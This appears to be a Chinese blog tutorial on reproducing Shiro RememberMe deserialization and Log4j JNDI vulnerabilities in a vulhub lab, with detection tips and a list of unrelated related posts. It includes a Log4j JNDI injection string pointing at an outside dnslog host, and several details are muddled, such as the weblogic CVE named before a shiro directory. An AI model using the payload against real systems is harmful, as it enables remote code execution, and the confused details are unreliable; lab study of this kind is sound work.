shiro反序列化和log4j

文章目录

安装环境

进入vulhb目录下的weblogic,复现CVE-2018-2894漏洞:

复制代码
cd /vulhub/shiro/CVE-2010-3863

查看docker-compose的配置文件:

复制代码
cat docker-compose.yml

如图,里面有一个镜像文件的信息和服务名,以及它的端口号(后面要用):

然后使用下面命令,搭建docker-compose并启动:

复制代码
sudo docker-compose up -d && sudo docker-compose up -d

如图,安装成功:

shiro漏洞验证

原理如下

Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码-->AES解密-->反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化-->AES加密-->Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

用bp自带的浏览器打开http://10.9.75.45:8080/,随意输入用户名密码并勾选记住我

点击登录后抓包,发送到repeat模块,发现请求包中有rememberme字段:

点击send发送,响应包中有set-cookie字段,并有rememberMe=deleteMe内容,这是一个shiro反序列化漏洞的强特征,说明有极大的可能存在shiro反序列化:

log4j

log4j(log for Java)是Apache的一个开源项目,是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中,未对字符合法性进行严格的限制,执行了JNDI协议加载的远程恶意脚本,从而造成RCE。

它是一个RCE命令执行的漏洞,它的日志的输出如下:print函数双引号中的内容会被当做字符处理

复制代码
$user=$_GET("user");
log.print("用户$user登录失败");

如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容,就会将大括号中的内容当做命令执行

如果流量中遇到下面三个关键字,极大可能是Java的漏洞攻击:

rmi、jndi、ldap

相关推荐
凭君语未可3 天前
详解Maven的主要生命周期
java·log4j·maven
WIN赢4 天前
单元测试的编写
单元测试·log4j
zerohawk7 天前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员10 天前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
故事与他64511 天前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache
江沉晚呤时13 天前
精益架构设计:深入理解与实践 C# 中的单一职责原则
java·jvm·算法·log4j·.netcore·net
为美好的生活献上中指14 天前
java每日精进 3.21 【SpringBoot规范2.0】
java·开发语言·spring boot·log4j·async·mail
-$_$-15 天前
【MyDB】5-索引管理之4-单元测试
单元测试·log4j
爱的叹息19 天前
java自带日志系统介绍(JUL)以及和Log4j 2、Logback、SLF4J不同日志工具的对比
java·log4j·logback
热心小张24 天前
Springboot单元测试
spring boot·单元测试·log4j